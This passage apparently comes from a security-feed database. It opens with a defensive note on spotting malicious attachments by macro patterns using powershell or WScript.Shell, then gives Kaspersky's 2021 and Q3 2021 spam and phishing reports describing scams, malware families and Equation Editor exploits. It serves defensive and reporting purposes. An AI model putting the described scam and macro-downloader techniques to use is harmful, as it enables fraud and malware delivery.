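Treat the output as triage signals, not verdicts: a genuine HTML attachment has no reason to carry a password field or to redirect on load, and a macro that pairs an auto-exec entry point with `WScript.Shell` or `powershell` is the downloader pattern described for SAgent regardless of what it eventually fetches. Macros that assemble those strings at runtime will not match the regular expressions, which is why a check like this belongs in front of, not instead of, sandbox detonation.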
If the victim followed all the instructions on the fake website, they handed their account and personal data over to the attackers.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094834/Spam_report_2021_17.png>)\n\nAnother way to gain access to users' personal data and purse strings was through fake vaccination surveys. Scammers sent out e-mails in the name of large pharmaceutical companies producing COVID-19 vaccines, or posing as certain individuals. The e-mail invited recipients to take part in a small study.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094909/Spam_report_2021_18.png>)\n\nThe scammers promised gifts or even monetary rewards to those who filled out the survey. After answering the questions, the victim would be taken to a "prize" page but told to pay a small necessary "commission fee" in order to receive it. The scammers received the money, but the victim got nothing as a result.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094931/Spam_report_2021_19.png>)\n\nWe also observed a mailing last year which exploited the subject of vaccination to spread malware. The subject lines of these e-mails were randomly selected from various sources. The attached document contained a macro for running a PowerShell script detected as [Trojan.MSOffice.SAgent.gen](<https://threats.kaspersky.com/en/threat/Trojan.MSOffice.SAgent/>). SAgent malware is used at the initial stage of an attack to deliver other malware to the victim's system.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094958/Spam_report_2021_20.png>)\n\n## Statistics: spam\n\n### Share of spam in mail traffic\n\nOn average, 45.56% of global mail traffic was spam in 2021. 
The figure fluctuated over the course of the year.\n\n_Share of spam in global e-mail traffic, 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101352/01-en-spam-report-2021.png>))_\n\nWe observed the largest percentage of spam in the second quarter (46.56%), which peaked in June (48.03%). The fourth quarter was the quietest period (44.54%), with only 43.70% of e-mails detected as spam in November.\n\n### Source of spam by country or region\n\nAs in 2020, the most spam in 2021 came from Russia (24.77%), whose share rose by 3.5 p.p. Germany, whose share rose 3.15 p.p. to 14.12%, remained in second place. They were followed by the United States (10.46%) and China (8.73%), which also stayed put in third and fourth place. The share of spam sent from the United States barely moved, while China's rose 2.52 p.p. compared to 2020.\n\n_Sources of spam by country or region in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101419/03-en-spam-report-2021.png>))_\n\nThe Netherlands (4.75%) moved up to fifth place, with its share rising by just 0.75 p.p. to overtake France (3.57%), whose share went in the opposite direction. Spain (3.00%) and Brazil (2.41%) also swapped places, and the top ten was rounded out by the same two countries as 2020, Japan (2.36%) and Poland (1.66%). In total, over three quarters of the world's spam was sent from these ten countries.\n\n### Malicious mail attachments\n\n_Dynamics of Mail Anti-Virus triggerings in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101444/04-en-spam-report-2021.png>))_\n\nIn 2021, the Kaspersky Mail Anti-Virus blocked 148 173 261 malicious e-mail attachments. May was the quietest month, when just over 10 million attachments were detected, i.e., 7.02% of the annual total. 
In contrast, October turned out to be the busiest month, when we recorded over 15 million attacks blocked by the Mail Anti-Virus, i.e., 10.24% of the annual total.\n\n#### Malware families\n\nThe attachments most frequently encountered and blocked by the antivirus in 2021 were Trojans from the [Agensla](<https://threats.kaspersky.com/en/threat/Trojan-PSW.MSIL.Agensla/>) family, which steal login credentials stored in browsers as well as credentials from e-mail and FTP clients. Members of this family were found in 8.67% of the malicious files detected, which is 0.97 p.p. up on 2020. Second place was taken by [Badun](<https://threats.kaspersky.com/en/threat/Trojan.Win32.Badun/>) Trojans (6.31%), distributed in archives and disguised as electronic documents. In another 3.95% of cases, our products blocked attacks exploiting the [CVE-2017-11882](<https://threats.kaspersky.com/en/threat/Exploit.MSOffice.CVE-2017-11882/>) vulnerability in Microsoft Equation Editor, which remains significant for the fourth year in a row. Almost the same amount of attachments belonged to the [Taskun](<https://threats.kaspersky.com/en/threat/Trojan.MSIL.Taskun/>) (3.93%) family, which create malicious tasks in Windows Task Scheduler.\n\n_TOP 10 malware families spread by e-mail attachments in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101509/05-en-spam-report-2021.png>))_\n\nThe fifth and tenth most popular forms of malware sent in attachments were Noon spyware Trojans for [any version](<https://threats.kaspersky.com/en/threat/Trojan-Spy.MSIL.Noon/>) of Windows OS (3.63%) and [32-bit versions](<https://threats.kaspersky.com/en/threat/Trojan-Spy.Win32.Noon/>) (1.90%), respectively. Malicious [ISO](<https://threats.kaspersky.com/en/threat/Trojan.Win32.ISO/>) disk images accounted for 3.21% of all attachments blocked, while SAgent Trojans contributed 2.53%. 
Eighth place was taken by a second exploited Equation Editor vulnerability, [CVE-2018-0802](<https://threats.kaspersky.com/en/threat/Exploit.MSOffice.CVE-2018-0802/>) (2.38%), while in ninth place were [Androm](<https://threats.kaspersky.com/en/threat/Backdoor.MSIL.Androm/>) backdoors (1.95%), which are mainly used to deliver different types of malware to an infected system.\n\n_TOP 10 types of malware spread by e-mail attachments in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101548/06-en-spam-report-2021.png>))_\n\nThe ten most common verdicts in 2021 coincided with the TOP 10 families. This means attackers mainly spread one member of each family.\n\n#### Countries and regions targeted by malicious mailings\n\nIn 2021, the Mail Anti-Virus most frequently blocked attacks on devices used in Spain (9.32%), whose share has risen for the second year in a row. Russia rose to second place (6.33%). The third largest number of malicious files was blocked in Italy (5.78%).\n\n_Countries and regions targeted by malicious mailshots in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101614/07-en-spam-report-2021.png>))_\n\nGermany (4.83%) had been the country most frequently targeted by malicious mailings for several years until 2020. It dropped to fifth place in 2021, giving way to Brazil (4.84%), whose share was just 0.01 p.p. higher than Germany's. They are followed in close succession by Mexico (4.53%), Vietnam (4.50%) and the United Arab Emirates (4.30%), with the same countries recorded in 2020 rounding out the TOP 10 targets: Turkey (3.37%) and Malaysia (2.62%).\n\n## Statistics: phishing\n\nIn 2021, our Anti-Phishing system blocked 253 365 212 phishing links. 
In total, 8.20% of Kaspersky users in different countries and regions around the world faced at least one phishing attack.\n\n### Map of phishing attacks\n\n_Geography of phishing attacks in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101643/08-en-spam-report-2021.png>))_\n\nUsers living in Brazil made the most attempts to follow phishing links, with the Anti-Phishing protection triggered on devices belonging to 12.39% of users in this country. Brazil was also the top phishing target in 2020. France rose to second place (12.21%), while Portugal (11.40%) remained third. It's worth noting that phishing activity was so rampant in France last year that the country topped the leaderboard of targeted users in the first quarter.\n\nMongolia (10.98%) found itself in fourth place for the number of users attacked in 2021, making it onto this list for the first time. The countries which followed in close succession were R\u00e9union (10.97%), Brunei (10.89%), Madagascar (10.87%), Andorra (10.79%), Australia (10.74%), and Ecuador (10.73%).\n\nTOP 10 countries by share of users targeted in phishing attacks:\n\n**Country** | **Share of attacked users*** \n---|--- \nBrazil | 12.39% \nFrance | 12.21% \nPortugal | 11.40% \nMongolia | 10.98% \nR\u00e9union | 10.97% \nBrunei | 10.89% \nMadagascar | 10.87% \nAndorra | 10.79% \nAustralia | 10.74% \nEcuador | 10.73% \n \n_* Share of users on whose devices Anti-Phishing was triggered out of all Kaspersky users in the country in 2021_\n\n### Top-level domains\n\nAs in 2020, most of the phishing websites blocked in 2021 used a .com domain name; the share of this TLD rose 7.19 p.p. to 31.55%. The second most popular domain name used by attackers was .xyz (13.71%), as those domains are cheap or even free to register. Third place went to the Chinese country-code domain .cn (7.14%). 
The Russian domain .ru (2.99%) fell to sixth place, although its share has grown since 2020. It now trails behind the domains .org (3.13%) and .top (3.08%), and is followed by the domain names .net (2.20%), .site (1.82%), and .online (1.56%). The list is rounded out by the low-cost .tk domain (1.17%) belonging to the island nation of Tokelau, which attackers are attracted to for the same reason they're attracted to .xyz.\n\n_Most frequent top-level domains for phishing pages in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101710/09-en-spam-report-2021.png>))_\n\n### Organizations mimicked in phishing attacks\n\n_The rating of organizations targeted by phishers is based on the triggering of the deterministic component in the Anti-Phishing system on user computers. The component detects all pages with phishing content that the user has tried to open by following a link in an e-mail message or on the web, as long as links to these pages are present in the Kaspersky database._\n\nThe demand for online shopping remained high in 2021, which is reflected in phishing trends: phishing pages were most frequently designed to mimic online stores (17.61%). These were closely followed by global Internet portals (17.27%) in second place. Payment systems (13.11%) climbed to third place, rising 4.7 p.p. to overtake banks (11.11%) and social networks (6.34%). Instant messengers (4.36%) and telecom companies (2.09%) stayed in sixth and seventh place, respectively, although their shares both fell. IT companies (2.00%) and financial services (1.90%) also held onto their places in the rating. 
The TOP 10 was rounded out by online games (1.51%), as attackers went after gamers more frequently than after users of delivery services in 2021.\n\n_Distribution of organizations most often mimicked by phishers, by category, 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101743/10-en-spam-report-2021.png>))_\n\n### Phishing in messengers\n\n_Statistics on messenger-based phishing are based on anonymized data from the Safe Messaging component of Kaspersky Internet Security for Android, voluntarily provided by users of this solution. Safe Messaging scans incoming messages and blocks attempts to follow any phishing or otherwise malicious links in them._\n\nIn 2021, Safe Messaging blocked 341 954 attempts to follow phishing links in various messengers. Most of these were links that users tried to follow from WhatsApp (90.00%). Second place was occupied by Telegram (5.04%), with Viber (4.94%) not far behind.\n\n_Distribution of links blocked by the Safe Messaging component, by messenger, 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101811/11-en-spam-report-2021.png>))_\n\nOn average, WhatsApp users attempted to follow phishing links 850 times a day. We observed the least phishing activity at the beginning of the year, while in December the weekly number of blocked links exceeded the 10 000 mark. There was a spike in phishing activity on WhatsApp in July, when Trojan.AndroidOS.Whatreg.b, which is mainly used to register new WhatsApp accounts, also became more active. We can't say for sure that there's a connection between Whatreg activity and phishing in this messaging app, but it's a possibility. 
We also observed another brief surge in phishing activity in the week from October 31 through November 6, 2021.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08100059/Spam_report_2021_21.png>)\n\n**_Dynamics of phishing activity on WhatsApp in 2021 (weekly number of detected links shown)_**\n\nOn average, the Safe Messaging component detected 45 daily attempts to follow phishing links sent via Telegram. Similar to WhatsApp, phishing activity increased towards the end of the year.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08100143/Spam_report_2021_22.png>)\n\n**_Dynamics of phishing activity on Telegram in 2021 (weekly number of detected links shown)_**\n\nA daily average of 45 links were also detected on Viber, although phishing activity on this messenger dropped off towards the end of the year. However, we observed a peak in August 2021.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08100213/Spam_report_2021_23.png>)\n\n**_Dynamics of phishing activity on Viber in 2021 (weekly number of detected links shown)_**\n\n## Conclusion\n\nAs we had expected, the key trends from 2020 continued into 2021. Attackers actively exploited the subject of COVID-19 in spam e-mails, which remained just as relevant as it was a year earlier. Moreover, baits related to vaccines and QR codes, two of the year's main themes, were added to the bag of pandemic-related tricks. As expected, we continued to observe a variety of schemes devised to hack corporate accounts. In order to achieve their aims, attackers forged e-mails mimicking notifications from various online collaboration tools, sent out notifications about non-existent documents and similar business-related baits. There were also some new trends, such as the investment scam, which is gaining momentum.\n\nThe key trends in phishing attacks and scams are likely to continue into the coming year.
Fresh "investment projects" will replace their forerunners. "Prize draws" will alternate with holiday giveaways when there's a special occasion to celebrate. Attacks on the corporate sector aren't going anywhere either. Given remote and hybrid working arrangements are here to stay, the demand for corporate accounts on various platforms is unlikely to wane. The topic of COVID-19 vaccination status will also remain relevant. Due to the intensity of the measures being imposed in different countries to stop the spread of the virus, we'll more than likely see a surge in the number of forged documents up for sale on the dark web, offering unrestricted access to public places and allowing holders to enjoy all the freedoms of civilization.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-02-09T10:00:28", "type": "securelist", "title": "Spam and phishing in 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-0802"], "modified": "2022-02-09T10:00:28", "id": "SECURELIST:2625ABE43A309D7E388C4F0EBCA62244", "href": "https://securelist.com/spam-and-phishing-in-2021/105713/", 
"cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-01T16:36:08", "description": "\n\n## Quarterly highlights\n\n### Scamming championship: sports-related fraud\n\nThis summer and early fall saw some major international sporting events. The delayed Euro 2020 soccer tournament was held in June and July, followed by the equally delayed Tokyo Olympics in August. Q3 2021 also featured several F1 Grand Prix races. There was no way that cybercriminals and profiteers could pass up such a golden opportunity. Fans wanting to attend events live encountered fake ticket-selling websites. Some sites made a point of stressing the tickets were "official", despite charging potential victims several times the [real price of a ticket](<https://www.kaspersky.ru/blog/ofitsialnye-bilety-v-teatr/25890/>), and some just took the money and disappeared.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29123731/Spam_report_Q3_2021_01.png>)\n\nScammers also laid traps for those preferring to watch the action online from the comfort of home. Fraudulent websites popped up offering free live broadcasts. On clicking the link, however, the user was asked to pay for a subscription. If that did not deter them, their money and bank card details went straight to the scammers, with no live or any other kind of broadcast in return. This scheme has been used many times before, only instead of sporting events, victims were offered the hottest movie and TV releases.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29123806/Spam_report_Q3_2021_02.png>)\n\nSoccer video games always attract a large following. This success has a downside: gaming platforms get attacked by hackers, especially during major soccer events. Accordingly, the Euro 2020 championship was used by scammers as bait to hijack accounts on the major gaming portal belonging to Japanese gaming giant Konami. 
The cybercriminals offered users big bonuses in connection with the tournament. However, when attempting to claim the bonus, the victim would land on a fake Konami login page. If they entered their credentials, the attackers took over their account and the "bonus" evaporated into thin air.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29123923/Spam_report_Q3_2021_03.png>)\n\n"Nigerian prince" scammers also had a close eye on Q3's sporting fixtures. The e-mails that came to our attention talked about multi-million-dollar winnings in Olympics-related giveaways. To receive the prize, victims were asked to fill out a form and e-mail it to the cybercriminals.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124024/Spam_report_Q3_2021_04.png>)\n\nSome messages anticipated upcoming events in the world of sport. The FIFA World Cup is slated for far-off November \u2014 December 2022, yet scammers are already inventing giveaways related to it.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124115/Spam_report_Q3_2021_05.png>)\n\nAmong other things, we found some rather unusual spam e-mails with an invitation to bid for the supply of products to be sold at airports and hotels during the World Cup. Most likely, the recipients would have been asked to pay a small commission to take part in the bidding or giveaway, with no results ever coming forth.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124200/Spam_report_Q3_2021_06.png>)\n\n### Scam: get it yourself, share with friends\n\nIn Q3 2021, our solutions blocked more than 5.6 million redirects to phishing pages. Anniversaries of well-known brands have become a favorite topic for attackers. According to announcements on fake sites, IKEA, Amazon, Tesco and other companies all held prize draws to celebrate a milestone date.
Wannabe participants had to perform a few simple actions, such as taking a survey or a spot-the-hidden-prize contest, or messaging their social network contacts about the promotion, and then were asked to provide card details, including the CVV code, to receive the promised payout. That done, the attackers not only got access to the card, but also requested payment of a small commission to transfer the (non-existent) winnings. Curiously, the scammers came up with fake round dates, for example, the 80th anniversary of IKEA, which in reality will come two years later. It is always advisable to check promotions on official websites, rather than trusting e-mails, which are easy to spoof.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124249/Spam_report_Q3_2021_07.png>)\n\nThere were also plenty of "holiday deals" supposedly from major Russian brands, with some, it seemed, showing particular generosity in honor of September 1, or Knowledge Day, when all Russian schools and universities go back after the summer break. Those companies allegedly giving away large sums were all related to education in one way or another. At the same time, the fraudulent scheme remained largely the same, with just some minor tinkering round the edges. For example, fake Detsky Mir (Children's World, a major chain of kids' stores) websites promised a fairly large sum of money, but on condition that the applicant sends a message about the "promotion" to 20 contacts or 5 groups. And the payment was then delayed, allegedly due to the need to convert dollars into rubles: for this operation, the "lucky ones" had to pay a small fee.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124402/Spam_report_Q3_2021_08.png>)\n\nOn a fake website holding a giveaway under the Perekrestok brand, after completing the tasks the "winner" was promised as a prize a QR code that could supposedly be used to make purchases in the company's stores. 
Note that Perekrestok does indeed issue coupons with QR codes to customers; that is, the cybercriminals tried to make the e-mail look plausible. When trying to retrieve this code, the potential victim would most likely be asked to pay a "commission" before being able to spend the prize money. Note too that QR codes from questionable sources can carry other threats, for example, spreading malware or debiting money in favor of the scammers.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124531/Spam_report_Q3_2021_09.png>)\n\nIn 2021, there was an increase in the number of fake resources posing as cookie-selling platforms. Users were promised a generous monetary reward (up to $5,000 a day) for selling such data. Those who fell for the tempting offer and followed the link were redirected to a fake page that allegedly "reads cookies from the victim's device to estimate their market value." The "valuation" most often landed in the US$700\u20132,000 range. To receive this money, the user was asked to put the cookies up at a kind of auction, in which different companies were allegedly taking part. The scammers assured that the data would go to the one offering the highest price.\n\nIf the victim agreed, they were asked to link their payment details to the account in the system and to top it up by \u20ac6, which the scammers promised to return, together with the auction earnings, within a few minutes. To top up the balance, the victim was required to enter their bank card details into an online form. 
Naturally, they received no payment, and the \u20ac6 and payment details remained in the attackers' possession.\n\nNote that the very idea of selling cookies from your device is risky: these files can store confidential information about your online activity \u2014 in particular, login details that let you avoid having to re-enter your credentials on frequently used sites.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124600/Spam_report_Q3_2021_10-scaled-1.jpeg>)\n\nEven in official mobile app stores, malware can sometimes sneak in. As such, this quarter saw a new threat in the shape of fraudulent welfare payment apps that could be downloaded from such platforms. The blurb described them as software that helps find and process payments from the government that the user is entitled to. Due payments (fake, of course) were indeed found, but to receive the money, the user was requested to "pay for legal services relating to form registration". The numerous positive reviews under the application form, as well as the design mimicking real government sites, added credibility. We informed the store in question, which then removed the fraudulent apps.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124627/Spam_report_Q3_2021_11.png>)\n\n### Spam support: call now, regret later\n\nE-mails inviting the recipient to contact support continue to be spam regulars. If previously they were dominated by IT topics (problems with Windows, suspicious activity on the computer, etc.), recently we have seen a rise in the number of e-mails talking about unexpected purchases, bank card transactions or account deactivation requests. Most likely, the change of subject matter is an attempt to reach a wider audience: messages about unintentional spending and the risk of losing an account can frighten users more than abstract technical problems.
However, the essence of the scam remained the same: the recipient, puzzled by the e-mail about a purchase or transfer they did not make, tried to call the support service at the number given in the message. To cancel the alleged transaction or purchase, they were asked to give their login credentials for the site from where the e-mail supposedly came. This confidential information fell straight into the hands of the cybercriminals, giving them access to the victim's account.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124650/Spam_report_Q3_2021_12.png>)\n\n### COVID-19\n\nNew life was injected into the COVID-19 topic this quarter. In connection with mass vaccination programs worldwide, and the introduction of QR codes and certificates as evidence of vaccination or antibodies, fraudsters began "selling" their own. We also encountered rogue sites offering negative PCR test certificates. The "customer" was asked first to provide personal information: passport, phone, medical policy, insurance numbers and date of birth, and then to enter their card details to pay for the purchase. As a result, all this information went straight to the malefactors.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124714/Spam_report_Q3_2021_13.png>)\n\nSpam in the name of generous philanthropists and large organizations offering lockdown compensation is already a standard variant of the "Nigerian prince" scam.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124741/Spam_report_Q3_2021_14.png>)\n\nHowever, "Nigerian prince" scams are not all that might await recipients of such messages. For example, the authors of spam exploiting Argentina's BBVA name had a different objective. Users were invited to apply for a government subsidy through this bank. To do so, they had to unpack a RAR archive that allegedly contained a certificate confirming the compensation.
In reality, the archive harbored malware detected by our solutions as Trojan.Win32.Mucc.pqp.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124803/Spam_report_Q3_2021_15.png>)\n\nCybercriminals also used other common COVID-19 topics to trick recipients into opening malicious attachments. In particular, we came across messages about the spread of the delta variant and about vaccination. The e-mail headers were picked from various information sources, chosen, most likely, for their intriguing nature. The attached document, detected as [Trojan.MSOffice.SAgent.gen](<https://threats.kaspersky.com/en/threat/Trojan.MSOffice.SAgent/>), contained a macro for running a PowerShell script. SAgent malware is used at the initial stage of the attack to deliver other malware to the victim's system.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124828/Spam_report_Q3_2021_16.png>)\n\n### Corporate privacy\n\nA new trend emerged this quarter in spam e-mails aimed at stealing credentials for corporate accounts, whereby cybercriminals asked recipients to make a payment. But upon going to the website to view the payment request, the potential victims were requested to enter work account login details. If they complied, the attackers got hold of the account.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124852/Spam_report_Q3_2021_17.png>)\n\n## Statistics: spam\n\n### Share of spam in mail traffic\n\nIn Q3 2021, the share of spam in global mail traffic fell once again, averaging 45.47% \u2014 down 1.09 p.p. against Q2 and 0.2 p.p. against Q1.\n\n_Share of spam in global mail traffic, April \u2013 September 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131406/01-en-spam-report-q3.png>))_\n\nIn July, this indicator fell to its lowest value since the beginning of 2021 (44.95%) \u2014 0.15 p.p. 
less than in March, the quietest month of H1. The highest share of spam in Q3 was seen in August (45.84%).\n\n### Source of spam by country\n\nThe top spam-source country is still Russia (24.90%), despite its share dropping slightly in Q3. Germany (14.19%) remains in second place, while China (10.31%) moved into third this quarter, adding 2.53 p.p. Meanwhile, the US (9.15%) shed 2.09 p.p. and fell to fourth place, while the Netherlands held on to fifth (4.96%).\n\n_Source of spam by country, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131453/03-en-spam-report-q3.png>))_\n\nOn the whole, the TOP 10 countries supplying the bulk of spam e-mails remained virtually unchanged from Q2. Sixth position still belongs to France (3.49%). Brazil (2.76%) added 0.49 p.p., overtaking Spain (2.70%) and Japan (2.24%), but the TOP 10 members remained the same. At the foot of the ranking, as in the previous reporting period, is India (1.83%).\n\n### Malicious mail attachments\n\nMail Anti-Virus this quarter blocked more malicious attachments than in Q2. Our solutions detected 35,958,888 pieces of malware, over 1.7 million more than in the previous reporting period.\n\n_Dynamics of Mail Anti-Virus triggerings, April \u2013 September 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131519/04-en-spam-report-q3.png>))_\n\nDuring the quarter, the number of Mail Anti-Virus triggerings grew: the quietest month was July, when our solutions intercepted just over 11 million attempts to open an infected file, while the busiest was September, with 12,680,778 malicious attachments blocked.\n\n#### Malware families\n\nIn Q3 2021, Trojans from the [Agensla](<https://threats.kaspersky.com/en/threat/Trojan-PSW.MSIL.Agensla/>) family (9.74%) were again the most widespread malware in spam. Their share increased by 3.09 p.p. against the last quarter. 
These Trojans are designed to steal login credentials from the victim's device. The share of the [Badun](<https://threats.kaspersky.com/en/threat/Trojan.Win32.Badun/>) family, which consists of various malware disguised as electronic documents, decreased slightly, pushing it into second place. Third place was taken by the [Noon](<https://threats.kaspersky.com/en/threat/Trojan-Spy.MSIL.Noon/>) spyware (5.19%), whose 32-bit [relatives](<https://threats.kaspersky.com/en/threat/Trojan-Spy.Win32.Noon/>) (1.71%) moved down to ninth. Meanwhile, the [Taskun](<https://threats.kaspersky.com/en/threat/Trojan.MSIL.Taskun/>) family, which creates malicious tasks in Task Scheduler, finished fourth this time around, despite its share rising slightly.\n\n_TOP 10 malware families in mail traffic, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131546/05-en-spam-report-q3.png>))_\n\nThe sixth place in TOP 10 common malware families in spam in Q3 was occupied by [exploits for the CVE-2018-0802 vulnerability](<https://threats.kaspersky.com/en/threat/Exploit.MSOffice.CVE-2018-0802/>) (3.28%), a new addition to the list. This vulnerability affects the Equation Editor component, just like the older but still popular (among cybercriminals) CVE-2017-11882, [exploits for which](<https://threats.kaspersky.com/en/threat/Exploit.MSOffice.CVE-2017-11882/>) (3.29%) were the fifth most prevalent in Q3. Seventh position went to malicious [ISO](<https://threats.kaspersky.com/en/threat/Trojan.Win32.ISO/>) disk images (2.97%), and eighth to [Androm](<https://threats.kaspersky.com/en/threat/Backdoor.MSIL.Androm/>) backdoors (1.95%). Loaders from the [Agent](<https://threats.kaspersky.com/en/threat/Trojan-Downloader.MSOffice.Agent/>) family again propped up the ranking (1.69%).\n\nThe TOP 10 most widespread e-mail malware in Q3 was similar to the families ranking. 
The only difference is that ninth place among individual samples is occupied by Trojan-PSW.MSIL.Stealer.gen stealers.\n\n_TOP 10 malicious attachments in spam, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131613/06-en-spam-report-q3.png>))_\n\n#### Countries targeted by malicious mailings\n\nIn Q3, Mail Anti-Virus was most frequently triggered on the computers of users in Spain. This country's share again grew slightly relative to the previous reporting period, amounting to 9.55%. Russia climbed to second place, accounting for 6.52% of all mail attachments blocked from July to September. Italy (5.47%) rounds out TOP 3, its share continuing to decline in Q3.\n\n_Countries targeted by malicious mailings, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131639/07-en-spam-report-q3.png>))_\n\nBrazil (5.37%) gained 2.46 p.p. and moved up to fourth position by number of Mail Anti-Virus triggerings. It is followed by Mexico (4.69%), Vietnam (4.25%) and Germany (3.68%). The UAE (3.65%) drops to eighth place. Also among the TOP 10 targets are Turkey (3.27%) and Malaysia (2.78%).\n\n## Statistics: phishing\n\nIn Q3, the Anti-Phishing system blocked 46,340,156 attempts to open phishing links. A total of 3.56% of Kaspersky users encountered this threat.\n\n### Geography of phishing attacks\n\nBrazil had the largest share of affected users (6.63%). The TOP 3 also included Australia (6.41%) and Bangladesh (5.42%), while Israel (5.33%) dropped from second to fifth, making way for Qatar (5.36%).\n\n_Geography of phishing attacks, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131707/08-en-spam-report-q3.png>))_\n\n### Top-level domains\n\nThe top-level domain most commonly used for hosting phishing pages in Q3, as before, was COM (29.17%). Reclaiming second place was XYZ (14.17%), whose share increased by 5.66 p.p. 
compared to the previous quarter. ORG (3.65%) lost 5.14 p.p. and moved down to fifth place, letting both the Chinese domain CN (9.01%) and TOP (3.93%) overtake it.\n\n_Top-level domain zones most commonly used for phishing, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131734/09-en-spam-report-q3.png>))_\n\nThe Russian domain RU (2.60%) remained the sixth most popular among cybercriminals in Q3, while the last four lines of the TOP 10 are occupied by the international domains NET (2.42%), SITE (1.84%), ONLINE (1.40%) and INFO (1.11%).\n\n### Organizations under phishing attack\n\n_The rating of organizations targeted by phishers is based on the triggering of the deterministic component in the Anti-Phishing system on user computers. The component detects all pages with phishing content that the user has tried to open by following a link in an email message or on the web, as long as links to these pages are present in the Kaspersky database._\n\nGlobal internet portals (20.68%) lead the list of organizations whose brands were most often used by cybercriminals as bait. Online stores (20.63%) are in second place by a whisker. Third place, as in the last quarter, is taken by banks (11.94%), and fourth by payment systems (7.78%). Fifth and sixth positions go to the categories "Social networks and blogs" (6.24%) and "IMs" (5.06%), respectively.\n\n_Distribution of organizations whose users were targeted by phishers, by category, Q3 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29131759/10-en-spam-report-q3.png>))_\n\nThe seventh line is occupied by online games (2.42%). Note that for the past two years websites in this category have featured in the TOP 10 baits specifically in the third quarter. 
